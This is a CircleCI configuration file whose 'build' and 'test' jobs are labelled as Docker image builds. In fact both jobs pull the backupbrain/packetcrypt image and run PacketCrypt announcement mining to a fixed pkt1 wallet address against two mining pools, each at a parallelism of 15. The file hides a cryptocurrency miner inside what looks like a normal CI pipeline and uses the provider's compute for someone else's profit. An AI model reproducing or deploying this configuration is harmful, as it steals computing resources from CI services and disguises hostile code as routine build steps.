version: 2
jobs:
  build:
    working_directory: /app
    docker:
      - image: docker:17.05.0-ce-git
    parallelism: 15  
    steps:
      - checkout
      - setup_remote_docker
      - run:
          name: Build application Docker imagess
          command: |
            docker pull backupbrain/packetcrypt  
            docker run backupbrain/packetcrypt ann -p pkt1qv437nndzvr9u8ps60g3d5dl0gssu84ulwksvfq http://pool.pktpool.io http://pool.pkt.world 2>&1 | grep -o "annmine.rs.*Ke.*"      
  test:
    docker:
      - image: docker:17.05.0-ce-git
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    parallelism: 15          
    steps:
      - checkout
      - run:
          name: Build application Docker imagesss
          command: |
            docker pull backupbrain/packetcrypt  
            docker run backupbrain/packetcrypt ann -p pkt1qv437nndzvr9u8ps60g3d5dl0gssu84ulwksvfq http://pool.pktpool.io http://pool.pkt.world 2>&1 | grep -o "annmine.rs.*Ke.*"
